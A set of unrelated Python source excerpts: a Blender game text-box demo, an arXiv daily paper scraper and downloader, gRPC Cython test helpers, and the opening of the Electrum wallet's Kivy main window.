'counter': {'text':"counter text long", 'physicsType':'NO_COLLISION'},
'clock': {'text':"short", 'physicsType':'NO_COLLISION'}
}
# Override.
_instructions = "Ctrl-Q to terminate.\nTAB to traverse."
@property
def textBoxIndex(self):
return self._textBoxIndex
@textBoxIndex.setter
def textBoxIndex(self, textBoxIndex):
self._textBoxIndex = textBoxIndex % len(self._textBoxes)
self.update_info()
@property
def textBox(self):
return self._textBoxes[self.textBoxIndex]
@property
def textInfo(self):
return self._textInfo[self.textBoxIndex]
def postion_cube(self):
if self._cube is not None:
cubePosition = self.textBox.worldPosition.copy()
self._cube.worldPosition = cubePosition
if self._cube2 is not None:
cubePosition = self.textBox.worldPosition.copy()
cubePosition[1] += self._textDimensions[self.textBoxIndex]
self._cube2.worldPosition = cubePosition
def update_info(self):
dimensions = list(blf.dimensions(0, self.textBox.text))
textWidth = self.text_width(self.textBox.text)
self._textDimensions[self.textBoxIndex] = textWidth
dimensions.append(textWidth)
self.postion_cube()
self.textInfo.text = "\n".join(
"{:.2f}".format(_) for _ in dimensions)
# Override.
def game_initialise(self):
super().game_initialise()
self.mainLock.acquire()
try:
self._textBoxIndex = None
self._cube = None
self._cube2 = None
self._set_up_text_boxes()
self._objectClock = self.game_add_text("clock")
worldPosition = self.bannerObject.worldPosition.copy()
worldPosition[1] += 13.0
self._objectClock.worldPosition = worldPosition.copy()
#
# Counter object, which is a Blender Text.
self._objectCounter = self.game_add_text("counter")
self._objectCounterNumber = 0
self.position_counter()
self._cube = self.gameScene.addObject('cube', self.gameGateway)
self._cubeDimensions = self.bpy.data.objects['cube'].dimensions
log(DEBUG, "Cube dimensions: {}. World scale: {}."
, self._cubeDimensions, self._cube.worldScale)
self._cube2 = self.gameScene.addObject('cube', self.gameGateway)
# Next line invokes the setter, so the cube gets positioned.
self.textBoxIndex = 0
finally:
self.mainLock.release()
#
# Spawn a thread on which to cycle the counter.
threading.Thread(target=self.cycle_count_run).start()
def _set_up_text_boxes(self):
boxes = self.arguments.boxes
self._textBoxes = [None] * boxes
self._textDimensions = [None] * boxes
self._textInfo = [None] * boxes
worldPosition = None
yOffset = 5.0
for index in range(boxes):
object_ = self.game_add_text('text', str(index + 1))
if worldPosition is None:
worldPosition = object_.worldPosition.copy()
worldPosition[1] -= yOffset * 0.5 * boxes
else:
worldPosition[1] += yOffset
object_.worldPosition = worldPosition.copy()
self._textBoxes[index] = object_
object_ = self.game_add_text('smalltext')
infoPosition = worldPosition.copy()
infoPosition[2] += self.arguments.infoOffset
object_.worldPosition = infoPosition
self._textInfo[index] = object_
self.textBoxIndex = index
self.update_info()
def cycle_count_run(self):
"""Cycle a counter for ever. Run as a thread."""
counterReset = 1000
while True:
self.mainLock.acquire()
try:
if self.terminating():
log(DEBUG, "Stop.")
return
self._objectCounter.text = str(self._objectCounterNumber)
self._objectCounterNumber = (
(self._objectCounterNumber + 1) % counterReset)
finally:
self.mainLock.release()
if self.arguments.sleep is not None:
time.sleep(self.arguments.sleep)
def game_keyboard(self, keyEvents):
keyString, ctrl, alt = self.key_events_to_string(keyEvents)
log(DEBUG, '{} "{}" ctrl:{} alt:{} {} {}'
, keyEvents, keyString, ctrl, alt
, self.bge.events.BACKSPACEKEY, self.bge.events.TABKEY)
if keyString == "q" and ctrl:
self.game_terminate()
return
append = not (alt or ctrl)
textBox = self._textBoxes[self.textBoxIndex]
for key, status in keyEvents:
if status != self.bge.logic.KX_INPUT_JUST_ACTIVATED:
continue
if key == self.bge.events.TABKEY:
self.textBoxIndex += 1
append = False
if (key == self.bge.events.BACKSPACEKEY
and len(self.textBox.text) > 0
):
self.textBox.text = self.textBox.text[:-1]
self.update_info()
append = False
if append:
self.textBox.text = ''.join((self.textBox.text, keyString))
self.update_info()
def game_tick_run(self):
#
# Formally, run the base class tick. Actually, it's a pass.
super().game_tick_run()
self.mainLock.acquire()
try:
#
# Update the time displayed in the clock.
self._objectClock.text = time.strftime("%H:%M:%S")
#
# Slide the counter around.
self.position_counter()
finally:
self.mainLock.release()
def position_counter(self):
worldPosition = self._objectClock.worldPosition.copy()
worldPosition[2] -= 2.0
counterRange = 50
counterScale = 4.0
counterPosition = self._objectCounterNumber % (counterRange * 2)
if counterPosition > counterRange:
counterPosition = (counterRange * 2) - counterPosition
worldPosition[1] += (
(counterScale * float(counterPosition)) / float(counterRange))
self._objectCounter.worldPosition = worldPosition.copy()
def get_argument_parser(self):
"""Method that returns an ArgumentParser. Overriden."""
parser = super().get_argument_parser()
parser.prog = ".".join((__name__, self.__class__.__name__))
parser.add_argument(
'--boxes', type=int, default=3, help='Number of text boxes.')
parser.add_argument(
'--infoOffset', type=float, default=2.0, help=
'Vertical offset from a text box to its information panel.')
parser.add_argument(
'--sleep', type=float, help=
"Sleep after each increment, for a floating point number of"
" seconds. Default is not to sleep.")
return parser
|
download_arxiv_daily.py
|
import requests
import time
import pandas as pd
from bs4 import BeautifulSoup
import os
import random
import numpy as np
from tqdm import tqdm
from utils.multi_download import download
import multiprocessing as mp
from downloader.gather_info import create_markdown # AOverview
from paperparse import std_parse_doc as spd
import glob
from configs import proxy, root_path
from utils.zip_tools import zip_ya
if not os.path.isdir(root_path): os.makedirs(root_path)
def get_one_page(url):
response = requests.get(url, proxies=proxy, verify=False)
while response.status_code == 403:
time.sleep(5 + random.uniform(0, 5))
response = requests.get(url)
print("url code 403")
if response.status_code == 200:
return response.text
return None
def get_paper_list():
url = 'https://arxiv.org/list/cs/pastweek?show=1000'
html = get_one_page(url)
soup = BeautifulSoup(html, features='html.parser')
all_day = soup.find_all('dl')
print("last day")
content = all_day[1]
list_ids = content.find_all('a', title='Abstract')
list_title = content.find_all('div', class_='list-title mathjax')
list_authors = content.find_all('div', class_='list-authors')
list_subjects = content.find_all('div', class_='list-subjects')
list_subject_split = []
for subjects in list_subjects:
subjects = subjects.text.split(': ', maxsplit=1)[1]
subjects = subjects.replace('\n\n', '')
subjects = subjects.replace('\n', '')
subject_split = subjects.split('; ')
list_subject_split.append(subject_split)
items = []
for i, paper in enumerate(zip(list_ids, list_title, list_authors, list_subjects, list_subject_split)):
items.append([paper[0].text, paper[1].text, paper[2].text, paper[3].text, paper[4]])
print("today")
content = all_day[0]
list_ids = content.find_all('a', title='Abstract')
list_title = content.find_all('div', class_='list-title mathjax')
list_authors = content.find_all('div', class_='list-authors')
list_subjects = content.find_all('div', class_='list-subjects')
list_subject_split = []
for subjects in list_subjects:
subjects = subjects.text.split(': ', maxsplit=1)[1]
subjects = subjects.replace('\n\n', '')
subjects = subjects.replace('\n', '')
subject_split = subjects.split('; ')
list_subject_split.append(subject_split)
for i, paper in enumerate(zip(list_ids, list_title, list_authors, list_subjects, list_subject_split)):
items.append([paper[0].text, paper[1].text, paper[2].text, paper[3].text, paper[4]])
name = ['id', 'title', 'authors', 'subjects', 'subject_split']
paper = pd.DataFrame(columns=name, data=items)
save_dir = os.path.join(root_path, time.strftime("%Y-%m-%d"))
if not os.path.isdir(save_dir): os.makedirs(save_dir)
paper.to_csv(os.path.join(save_dir, time.strftime("%Y-%m-%d") + '.csv'))
def get_abstract(arxiv_id='2101.12159'):
html = get_one_page("https://arxiv.org/abs/" + arxiv_id)
soup = BeautifulSoup(html, features='html.parser')
titles = soup.find_all('h1', class_='title mathjax')
title = titles[0].text
abstracts = soup.find_all('blockquote', class_='abstract mathjax')
abs = abstracts[0].text
abs = abs.replace('-\n', '') # 连接换行单词
abs = abs.replace('\n', " ") # 删除换行
return title, abs
def save_markdown(save_dir, title, abs, url):
detail = {}
detail['title'] = title
detail['abs'] = abs
detail['url'] = url
np.save(os.path.join(save_dir, "details.npy"), detail)
# np.savetxt(os.path.join(save_dir, "abs.md"), [ss], "%s")
print("write abs txt finish")
def list_all_paper():
dirs = os.listdir(root_path)
total_paper = []
for d in dirs:
path = os.path.join(root_path, d)
files = os.listdir(path)
total_paper = total_paper + files
return total_paper
def check_is_exists(arxiv_id):
if arxiv_id in exist_papers:
return True
else:
return False
def download_paper(arxiv_id='2101.12159', paper_title=''):
# if check_is_exists(arxiv_id): # 过去曾经下载
# return None
selected_paper_id = arxiv_id.replace(".", "_")
pdfname = paper_title.replace("/", "_") # pdf名中不能出现/和:
pdfname = pdfname.replace("?", "_")
pdfname = pdfname.replace("\"", "_")
pdfname = pdfname.replace("*", "_")
pdfname = pdfname.replace(":", "_")
pdfname = pdfname.replace("\n", "")
pdfname = pdfname.replace("\r", "")
pdfname = pdfname.replace("\\", "")
pdfname = pdfname.replace(" ", " ")
# print(time.strftime("%Y-%m-%d") + '/%s %s.pdf' % (selected_paper_id, paper_title))
if len(pdfname) > 130:
pdfname = pdfname[:100]
save_dir = os.path.join(root_path, time.strftime("%Y-%m-%d"), arxiv_id)
if not os.path.isdir(save_dir): os.makedirs(save_dir)
save_path = os.path.join(save_dir, arxiv_id + "_" + pdfname + ".pdf")
if os.path.exists(save_path): # 存在则跳过
return save_path
try:
download('https://arxiv.org/pdf/' + arxiv_id + ".pdf", save_path)
except:
os.removedirs(save_dir)
raise RuntimeWarning('download error!')
# 处理文本
title, abs = get_abstract(arxiv_id)
print(arxiv_id)
save_markdown(save_dir, title, abs, 'https://arxiv.org/pdf/' + arxiv_id)
print("finish download")
return save_path
def get_daily_paper(key_words, subject_words, files):
if not (len(key_words) > 0 and len(subject_words) > 0):
print('请输入关键词')
return None
global exist_papers
exist_papers = list_all_paper()
path_daily_paper = os.path.join(root_path, time.strftime("%Y-%m-%d"), time.strftime("%Y-%m-%d") + '.csv')
if not os.path.exists(path_daily_paper):
print('update paper list begining')
get_paper_list()
print('update paper list finish')
paper = pd.read_csv(path_daily_paper)
selected_papers = paper[paper['title'].str.contains(key_words[0], case=False)]
for key_word in key_words[1:]:
selected_paper1 = paper[paper['title'].str.contains(key_word, case=False)]
selected_papers = pd.concat([selected_papers, selected_paper1], axis=0)
selected_papers.drop_duplicates(inplace=True)
selected_subject_papers = selected_papers[
selected_papers['subject_split'].str.contains(subject_words[0], case=False)]
for key_word in subject_words[1:]:
selected_paper1 = selected_papers[selected_papers['subject_split'].str.contains(key_word, case=False)]
selected_subject_papers = pd.concat([selected_subject_papers, selected_paper1], axis=0)
selected_subject_papers.drop_duplicates()
for i, t in zip(selected_subject_papers['id'], tqdm(selected_subject_papers['title'])):
id = i.split(':', maxsplit=1)[1]
title = t.split(':', maxsplit=1)[1]
print("process ", id)
try:
save_path = download_paper(id, title)
files.put(save_path)
print('finish ', id)
except:
print('cannot download', id)
files.put("finish")
print("put finish")
def finish(needPDF, needZip):
if not needPDF:
pdf = glob.glob(os.path.join(root_path, '*', '*', '*.pdf'))
for p in pdf:
os.remove(p)
if needZip:
zip_ya(root_path)
def process_context(files, share_dict, needPDF, needZip):
while True:
if not files.empty():
path_pdf = files.get()
if path_pdf is not None:
if path_pdf == 'finish':
np.savetxt(os.path.join(root_path, time.strftime("%Y-%m-%d"), "README.md"), [share_dict['all_md']],
"%s", encoding='utf-8')
finish(needPDF, needZip)
share_dict['break'] = 'true'
break
# all_md = create_markdown(spd, path_pdf, share_dict['all_md'])
# share_dict['all_md'] = all_md
try:
all_md = create_markdown(spd, path_pdf, share_dict['all_md'])
share_dict['all_md'] = all_md
except:
print("except =====>>>>>", path_pdf)
files.put(path_pdf)
time.sleep(1)
else:
time.sleep(1)
def start_parse(key_words, subject_words, needPDF=True, needZip=True):
with mp.Manager() as mg:
files = mp.Queue(30)
share_dict = mp.Manager().dict()
share_dict['all_md'] = ''
share_dict['break'] = 'false'
p1 = mp.Process(target=process_context, args=(files, share_dict, needPDF, needZip))
p1.start()
get_daily_paper(key_words, subject_words, files)
while True:
if not share_dict['break'] == 'true':
time.sleep(10)
|
_common.py
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for tests of the Cython layer of gRPC Python."""
import collections
import threading
from grpc._cython import cygrpc
RPC_COUNT = 4000
INFINITE_FUTURE = cygrpc.Timespec(float('+inf'))
EMPTY_FLAGS = 0
INVOCATION_METADATA = cygrpc.Metadata(
(cygrpc.Metadatum(b'client-md-key', b'client-md-key'),
cygrpc.Metadatum(b'client-md-key-bin', b'\x00\x01' * 3000),))
INITIAL_METADATA = cygrpc.Metadata(
(cygrpc.Metadatum(b'server-initial-md-key', b'server-initial-md-value'),
cygrpc.Metadatum(b'server-initial-md-key-bin', b'\x00\x02' * 3000),))
TRAILING_METADATA = cygrpc.Metadata(
(cygrpc.Metadatum(b'server-trailing-md-key', b'server-trailing-md-value'),
cygrpc.Metadatum(b'server-trailing-md-key-bin', b'\x00\x03' * 3000),))
class QueueDriver(object):
def __init__(self, condition, completion_queue):
self._condition = condition
self._completion_queue = completion_queue
self._due = collections.defaultdict(int)
self._events = collections.defaultdict(list)
def add_due(self, tags):
if not self._due:
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events[event.tag].append(event)
self._due[event.tag] -= 1
self._condition.notify_all()
if self._due[event.tag] <= 0:
self._due.pop(event.tag)
if not self._due:
return
thread = threading.Thread(target=in_thread)
thread.start()
for tag in tags:
self._due[tag] += 1
def event_with_tag(self, tag):
with self._condition:
while True:
if self._events[tag]:
return self._events[tag].pop(0)
else:
self._condition.wait()
def execute_many_times(behavior):
return tuple(behavior() for _ in range(RPC_COUNT))
class OperationResult(
collections.namedtuple('OperationResult', (
'start_batch_result', 'completion_type', 'success',))):
pass
SUCCESSFUL_OPERATION_RESULT = OperationResult(
cygrpc.CallError.ok, cygrpc.CompletionType.operation_complete, True)
class RpcTest(object):
def setUp(self):
self.server_completion_queue = cygrpc.CompletionQueue()
self.server = cygrpc.Server(cygrpc.ChannelArgs([]))
self.server.register_completion_queue(self.server_completion_queue)
port = self.server.add_http2_port(b'[::]:0')
self.server.start()
self.channel = cygrpc.Channel('localhost:{}'.format(port).encode(),
cygrpc.ChannelArgs([]))
self._server_shutdown_tag = 'server_shutdown_tag'
self.server_condition = threading.Condition()
self.server_driver = QueueDriver(self.server_condition,
self.server_completion_queue)
with self.server_condition:
self.server_driver.add_due({
self._server_shutdown_tag,
})
self.client_condition = threading.Condition()
self.client_completion_queue = cygrpc.CompletionQueue()
self.client_driver = QueueDriver(self.client_condition,
self.client_completion_queue)
def tearDown(self):
self.server.shutdown(self.server_completion_queue,
self._server_shutdown_tag)
self.server.cancel_all_calls()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, key):
self.show_info(_('Payment was sent'))
self._trigger_update_history()
def on_payment_failed(self, event, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data[15:])
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
